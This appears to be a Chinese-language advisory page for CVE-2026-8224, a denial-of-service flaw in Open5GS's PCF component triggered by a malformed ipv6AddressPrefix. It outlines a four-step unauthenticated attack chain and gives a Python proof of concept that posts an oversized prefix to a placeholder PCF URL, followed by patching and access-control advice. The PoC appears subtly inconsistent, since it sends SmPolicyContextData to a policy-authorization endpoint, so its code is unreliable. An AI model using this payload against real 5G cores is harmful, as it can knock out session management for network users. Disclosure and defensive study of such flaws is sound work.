CVE-2026-8224 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8224

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及之前版本存在拒绝服务漏洞。漏洞位于PCF组件的`pcf_sess_set_ipv6prefix`函数中。由于对参数`SmPolicyContextData.ipv6AddressPrefix`的验证不当，远程攻击者无需认证即可发送特制数据包导致服务崩溃。该漏洞利用难度低，且已公开披露，建议尽快修复。

技术细节

该漏洞源于Open5GS PCF组件在处理IPv6前缀分配时的逻辑缺陷。具体而言，`src/pcf/context.c`文件中的`pcf_sess_set_ipv6prefix`函数在解析`SmPolicyContextData`结构体的`ipv6AddressPrefix`字段时，未对输入数据进行严格的边界检查或格式验证。攻击者可以通过向PCF暴露的接口发送构造恶意的HTTP请求（如策略绑定创建操作），传入异常的IPv6前缀值。这种操纵会触发底层处理逻辑的错误，导致进程异常终止或资源耗尽。鉴于5G核心网组件间的互联性，PCF的崩溃可能会影响网络的会话管理功能，造成严重的拒绝服务。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找暴露的Open5GS PCF组件接口（通常运行在特定的SBI端口）。

STEP 2

构造恶意数据

攻击者构造包含畸形`ipv6AddressPrefix`参数的SmPolicyContextData数据包。

STEP 3

发送请求

攻击者远程向目标PCF接口发送特制的HTTP POST请求，无需身份认证。

STEP 4

触发漏洞

目标系统在解析畸形参数时触发异常，导致PCF进程崩溃或停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target PCF Service (Example URL)
target_url = "http://target-pcf-ip:80/npcf-policyauthorization/v1/policies"

# Malicious payload targeting the vulnerable parameter
payload = {
    "SmPolicyContextData": {
        "ipv6AddressPrefix": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  # Long/Malformed prefix
    }
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "PoC-Client"
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    if response.status_code == 500 or response.status_code == 400:
        print("Potential trigger of vulnerability (Service Error)")
except Exception as e:
    print(f"Connection failed or Service crashed: {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

建议立即在生产环境中应用官方提供的补丁更新。在无法立即升级的情况下，应严格限制网络访问控制列表（ACL），阻断非授权来源对PCF组件端口的访问，并密切监控系统日志和进程状态。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8224
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8224
3 Details https://www.cvedetails.com/cve/CVE-2026-8224/
4 VulDB https://vuldb.com/cve/CVE-2026-8224
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4439
7 Link https://vuldb.com/submit/808443
8 Link https://vuldb.com/vuln/362441
9 Link https://vuldb.com/vuln/362441/cti